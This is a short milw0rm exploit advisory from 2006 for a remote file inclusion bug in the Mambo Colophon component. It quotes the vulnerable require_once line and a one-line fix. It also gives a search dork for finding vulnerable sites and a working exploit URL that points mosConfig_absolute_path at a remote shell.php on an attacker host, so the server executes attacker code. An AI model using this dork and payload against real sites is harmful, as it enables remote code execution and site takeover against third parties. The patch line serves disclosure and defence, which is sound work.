########### Command Mambo Colophon =<1.2 ##by #Drago84######### Found By Drago84 Exclusive Security Italian Security This bug allows a remote atacker to execute commands via rfi page: admin.colophon.php bug: require_once("$mosConfig_absolute_path/components/com_colophon/language/$mosConfig_lang.php"); path: add in admin.colophon.php defined( '_VALID_MOS' ) or die( 'hacking attemp.' ); dork: inurl:com_colophon expl: htttp:/www.site.it/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://evalsite/shell.php? # milw0rm.com [2006-07-29]